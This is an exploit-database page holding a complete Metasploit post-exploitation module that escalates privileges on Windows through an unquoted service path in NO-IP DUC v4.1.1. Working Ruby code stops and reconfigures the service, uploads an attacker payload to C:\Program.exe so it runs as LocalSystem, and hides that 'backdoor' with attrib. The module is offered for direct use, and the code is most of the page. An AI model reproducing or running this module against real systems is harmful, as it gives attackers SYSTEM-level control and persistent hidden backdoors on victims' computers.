0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NO-IP DUC v4.1.1 Unquoted Service Path Privilege Escalation Exploit
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # Exploit Title : NO-IP_privilege_scalation.rb - 'Unquoted Service Path Privilege Escalation' # PDF Version : 4.1.1 # vuln Discover : Ehsan Hosseini # Module Author : pedr0 Ubuntu [r00t-3xp10it] # Tested on : Windows 7 Professional # Software Link : http://www.noip.com/client/DUCSetup_v4_1_1.exe # # # # [ DESCRIPTION ] # NO-IP DUC v4.1.1 installs a service with an unquoted service path. # This enables a local privilege escalation vulnerability. To exploit this vulnerability, # a local attacker can insert an executable file in the path of the service. # Rebooting the system or restarting the service will run the malicious executable # with elevated privileges. # # --------------------------------------------------------------------------- # C:\>sc qc NoIPDUCService4 # [SC] QueryServiceConfig SUCCESS # # SERVICE_NAME: NoIPDUCService4 # TYPE : 10 WIN32_OWN_PROCESS # START_TYPE : 2 AUTO_START # ERROR_CONTROL : 1 NORMAL # BINARY_PATH_NAME : C:\Program Files\No-IP\ducservice.exe # LOAD_ORDER_GROUP : # TAG : 0 # DISPLAY_NAME : NO-IP DUC v4.1.1 # DEPENDENCIES : # SERVICE_START_NAME : LocalSystem # --------------------------------------------------------------------------- # Using the BINARY_PATH_NAME listed above as an example, an executable named # "Program.exe" could be placed in "C:\", and it would be executed as the # Local System user next time the service was restarted. # # # # [ MODULE OPTIONS ] # Input The session number to run this module on => set SESSION 3 # Input full path of Program.exe to be uploaded => set UPLOAD_PATH /root/Program.exe # Check pdfcDispatcher service auto-start status? => set SERVICE_STATUS true # use attrib to hidde your program.exe in target? => set HIDDEN_ATTRIB true # HINT: to unset all options: msf post(NO-IP_privilege_scalation) > unset all # # # # [ PORT MODULE TO METASPLOIT DATABASE ] # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/NO-IP_privilege_scalation.rb # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/NO-IP_privilege_scalation.rb # Manually Path Search: root@kali:~# locate modules/post/windows/escalate # # # [ LOAD/USE AUXILIARY ] # meterpreter > background # msf exploit(handler) > reload_all # msf exploit(handler) > use post/windows/escalate/NO-IP_privilege_scalation # msf post(NO-IP_privilege_scalation) > info # msf post(NO-IP_privilege_scalation) > show options # msf post(NO-IP_privilege_scalation) > show advanced options # msf post(NO-IP_privilege_scalation) > set [option(s)] # msf post(NO-IP_privilege_scalation) > exploit ## # ---------------------------- # Module Dependencies/requires # ---------------------------- require 'rex' require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/priv' # ---------------------------------- # Metasploit Class name and includes # ---------------------------------- class MetasploitModule < Msf::Post Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::Windows::Priv # ----------------------------------------- # Building Metasploit/Armitage info GUI/CLI # ----------------------------------------- def initialize(info={}) super(update_info(info, 'Name' => 'NO-IP_DUC v4.1.1 - Unquoted Service Path Privilege Escalation', 'Description' => %q{ This post-exploitation module requires a meterpreter session to be able to upload/inject our Program.exe into NoIPDUCService4 service. NO-IP_DUC v4.1.1 installs a service with an unquoted service path. This enables a local privilege escalation vulnerability. To exploit this vulnerability, a local attacker can insert an executable file in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "Warning: payload to be uploaded should be named as: Program.exe" }, 'License' => UNKNOWN_LICENSE, 'Author' => [ 'Vuln discover: Ehsan Hosseini', # vulnerability discover 'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author 'Special thanks: milton_barra|Chaitanya Haritash', # testing/debug module ], 'Version' => '$Revision: 1.0', 'DisclosureDate' => 'out 28 2016', 'Platform' => 'windows', 'Arch' => 'x86_x64', 'Privileged' => 'false', 'Targets' => [ # Tested againts windows 7 (32 bits) | XP SP1 (32 bits) [ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ] ], 'DefaultTarget' => '3', # default its to run againts windows 7 (32 bits) 'References' => [ [ 'URL', 'goo.gl/ew1IUm' ], [ 'URL', 'goo.gl/U54297' ], [ 'URL', 'http://sourceforge.net/users/peterubuntu10' ], [ 'URL', 'http://sourceforge.net/projects/msf-auxiliarys/repository' ] ], 'DefaultOptions' => { 'SESSION' => '1', # Default its to run againts session 1 }, 'SessionTypes' => [ 'meterpreter' ] )) register_options( [ OptString.new('SESSION', [ true, 'The session number to run this module on']), OptString.new('UPLOAD_PATH', [ false, 'The full path of Program.exe to be uploaded']), OptBool.new('SERVICE_STATUS', [ false, 'Check remote NoIPDUCService4 service settings?' , false]), OptBool.new('HIDDEN_ATTRIB', [ false, 'Use Attrib command to Hide Program.exe?' , false]) ], self.class) end # ---------------------------------------------- # Check for proper target Platform (win32|win64) # ---------------------------------------------- def unsupported session = client sys = session.sys.config.sysinfo print_warning("[ABORT]: Operative System => #{sys['OS']}") print_error("Only windows systems are supported by this module...") print_error("Please execute [info] for further information...") print_line("") raise Rex::Script::Completed end # ----------------------------------------------------------- # UPLOAD OUR EXECUTABLE INTO NoIPDUCService4 BINARY_PATH_NAME # ----------------------------------------------------------- def ls_stage1 r='' session = client shell = "Program.exe" payload = "C:\\Program.exe" upath = datastore['UPLOAD_PATH'] bin_path = "C:\\Program Files\\No-IP\\ducservice.exe" # check for proper config settings enter # to prevent 'unset all' from deleting default options... if datastore['UPLOAD_PATH'] == 'nil' print_error("Options not configurated correctly...") print_warning("Please set UPLOAD_PATH option!") return nil else print_status("Deploying backdoor into target system!") sleep(1.0) end # check if vulnerable service (executable) exists if client.fs.file.exist?("#{bin_path}") print_warning("NoIPDUCService4 service:found") sleep(1.0) print_good("Stoping NoIPDUCService4 service...") # stop service to enable proper configuration r = session.sys.process.execute("cmd.exe /c sc stop NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true}) sleep(2.5) print_good("Set service to auto-start with windows...") # set service to auto-start with windows r = session.sys.process.execute("cmd.exe /c sc config NoIPDUCService4 start= auto", nil, {'Hidden' => true, 'Channelized' => true}) sleep(1.0) # upload our executable into temp foldder print_good("Uploading payload to target system...") client.fs.file.upload("%temp%\\#{shell}","#{upath}") sleep(2.0) # move payload to the rigth directory (unquoted service path) print_good("moving payload to: #{payload}") r = session.sys.process.execute("cmd.exe /c move /y %temp%\\#{shell} #{payload}", nil, {'Hidden' => true, 'Channelized' => true}) sleep(1.0) # start remote service ... print_good("Restarting pdfcDispatcher service...") r = session.sys.process.execute("cmd.exe /c sc start NoIPDUCService4", nil, {'Hidden' => true, 'Channelized' => true}) sleep(2.0) # task completed successefully... print_warning("NoIPDUCService4 service [binary_path_name] backdoored successefuly!") print_status("Setup one handler and Wait everytime that system restarts OR") print_status("Setup one handler and restart NoIPDUCService4 service: sc start NoIPDUCService4") print_line("") else print_error("NoIPDUCService4 service => NOT FOUND...") print_warning("Target system does not appear to vulnerable to this") print_warning("post-module has aborted all tasks in hands :( ") print_line("") end # close channel when done r.channel.close r.close # error exception funtion rescue ::Exception => e print_error("Error: #{e.class} #{e}") end # ------------------------------------------------- # USE ATTRIB COMMAND TO HIDDE PROGRAM.EXE (PAYLOAD) # ------------------------------------------------- def ls_stage2 r='' session = client shell = "Program.exe" payload = "C:\\Program.exe" # check for proper config settings enter # to prevent 'unset all' from deleting default options... if datastore['HIDDEN_ATTRIB'] == 'nil' print_error("Options not configurated correctly...") print_warning("Please set HIDDEN_ATTRIB option!") return nil else print_status("Using Attrib command to hide backdoor!") sleep(1.0) end # check if backdoor.exe exist on target if client.fs.file.exist?("#{payload}") print_status("Backdoor #{shell} file:found") sleep(1.0) # change attributes of backdoor to hidde it from site... r = session.sys.process.execute("cmd.exe /c attrib +h +s #{payload}", nil, {'Hidden' => true, 'Channelized' => true}) print_good(" Execute => attrib +h +s #{payload}") sleep(2.0) # diplay output to user print_status("Our #{shell} its hidden from normal people!") print_status("Just dont feed the black hacker within :( ") print_warning("To revert attributes: attrib -h -s #{payload}") print_line("") # close channel when done r.channel.close r.close else print_error("#{payload} => NOT FOUND...") print_warning("post-module has aborted all tasks in hands :( ") print_line("") end # error exception funtion rescue ::Exception => e print_error("Error: #{e.class} #{e}") end # ------------------------------------------- # CHECK/DISPLAY pdfcDispatcher SERVICE STATUS # ------------------------------------------- def ls_stage3 r='' session = client serv="NoIPDUCService4" sysnfo = session.sys.config.sysinfo # check for proper config settings enter # to prevent 'unset all' from deleting default options... if datastore['SERVICE_STATUS'] == 'nil' print_error("Options not configurated correctly...") print_warning("Please set SERVICE_STATUS option!") return nil else print_status("Checking NoIPDUCService4 service settings!") sleep(1.0) end print_warning("Reading service hive registry keys...") # search in target regedit for WSearch auto-start service status # Value:Start - dword: 2 - auto | 3 - manual | 4 - disabled if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '2' startup = "auto_start" end if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '3' startup = "manual_start" end if registry_getvaldata("HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4","Start") == '4' startup = "disabled_start" else startup = "unknow" print_error("post-module cant define service auto_start status...") print_warning("enter into a shell session and execute: sc qc NoIPDUCService4 status") end sleep(1.0) # display pdfcDispatcher service current settings. print_line("") print_line(" :host => #{sysnfo['Computer']}") print_line(" :service => #{serv}") print_line(" :status => running") print_line(" :startup => #{startup}") print_line("") # error exception funtion rescue ::Exception => e print_error("Error: #{e.class} #{e}") end # ------------------------------------------------ # MAIN DISPLAY WINDOWS (ALL MODULES - def run) # Running sellected modules against session target # ------------------------------------------------ def run session = client # Check for proper target Platform unsupported if client.platform !~ /win32|win64/i # Variable declarations (msf API calls) sysnfo = session.sys.config.sysinfo runtor = client.sys.config.getuid runsession = client.session_host directory = client.fs.dir.pwd # Print banner and scan results on screen pdfcDispatcher print_line(" +----------------------------------------------+") print_line(" | NO-IP_DUCK - SERVICE PRIVILEGE ESCALATION |") print_line(" | Author: Pedro Ubuntu [ r00t-3xp10it ] |") print_line(" +----------------------------------------------+") print_line("") print_line(" Running on session : #{datastore['SESSION']}") print_line(" Computer : #{sysnfo['Computer']}") print_line(" Operative System : #{sysnfo['OS']}") print_line(" Target IP addr : #{runsession}") print_line(" Payload directory : #{directory}") print_line(" Client UID : #{runtor}") print_line("") print_line("") # elevate session privileges befor runing options client.sys.config.getprivs.each do |priv| end # ------------------------------------ # Selected settings to run # ------------------------------------ if datastore['UPLOAD_PATH'] ls_stage1 end if datastore['HIDDEN_ATTRIB'] ls_stage2 end if datastore['SERVICE_STATUS'] ls_stage3 end end end # 0day.today [2024-12-24] #